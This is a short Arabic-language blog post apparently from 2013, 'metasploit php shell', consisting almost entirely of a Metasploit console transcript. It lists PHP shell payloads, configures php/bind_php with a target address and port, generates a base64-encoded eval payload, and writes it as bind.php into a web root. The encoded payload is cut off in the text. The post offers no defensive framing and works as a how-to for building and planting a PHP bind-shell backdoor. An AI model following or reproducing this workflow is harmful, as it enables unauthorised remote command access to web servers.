المشاركات الشائعة

d

Solo copea el codigo y dirigete a diseño/Html y pegas el codigo
Solo copea el codigo y dirigete a diseño/Html y pegas el codigo

لإستماع للقرأن الكريم

عدد ضيوف الموقع

sild

آخر التعليقات

الخميس، 22 أغسطس 2013

metasploit php shell


  1.                                   _
  2.                                  | |      o
  3.  _  _  _    _ _|_  __,   ,    _  | |  __    _|_
  4. / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  5.   |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
  6.                            /|
  7.                            \|
  8.        =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
  9. + -- --=[ 644 exploits - 328 auxiliary
  10. + -- --=[ 216 payloads - 27 encoders - 8 nops
  11.        =[ svn r11722 updated 4 days ago (2011.02.08)
  12. msf > search php
  13. [*] Searching loaded modules for pattern 'php'...
  14. <--BIG SNIP-->
  15. NOP Generators
  16. ==============
  17.    Name         Disclosure Date  Rank    Description
  18.    ----         ---------------  ----    -----------
  19.    php/generic                   normal  PHP Nop Generator
  20. Payloads
  21. ========
  22.    Name                         Disclosure Date  Rank    Description
  23.    ----                         ---------------  ----    -----------
  24.    php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)
  25.    php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)
  26.    php/download_exec                             normal  PHP Executable Download and Execute
  27.    php/exec                                      normal  PHP Execute Command
  28.    php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager
  29.    php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager
  30.    php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline
  31.    php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)
  32.    php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)
  33.    php/shell_findsock                            normal  PHP Command Shell, Find Sock
  34. msf > use php/bind_php
  35. msf payload(bind_php) > show options
  36. Module options (payload/php/bind_php):
  37.    Name   Current Setting  Required  Description
  38.    ----   ---------------  --------  -----------
  39.    LPORT  4444             yes       The listen port
  40.    RHOST                   no        The target address
  41. msf payload(bind_php) > set RHOST 192.168.1.5
  42. RHOST => 192.168.1.5
  43. msf payload(bind_php) > set LPORT 4321
  44. LPORT => 4321
  45. msf payload(bind_php) > generate -h
  46. Usage: generate [options]
  47. Generates a payload.
  48. OPTIONS:
  49.     -E        Force encoding.
  50.     -b <opt>  The list of characters to avoid: '\x00\xff'
  51.     -e <opt>  The name of the encoder module to use.
  52.     -f <opt>  The output file name (otherwise stdout)
  53.     -h        Help banner.
  54.     -i <opt>  the number of encoding iterations.
  55.     -k        Keep the template executable functional
  56.     -o <opt>  A comma separated list of options in VAR=VAL format.
  57.     -p <opt>  The Platform for output.
  58.     -s <opt>  NOP sled length.
  59.     -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
  60.     -x <opt>  The executable template to use
  61. msf payload(bind_php) > generate -t raw -e php/base64
  62. eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
  63. msf payload(bind_php) > exit
  64. root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php

    sec-worldweb.blogspot.com

Comments
0 Comments

0 التعليقات:

إرسال تعليق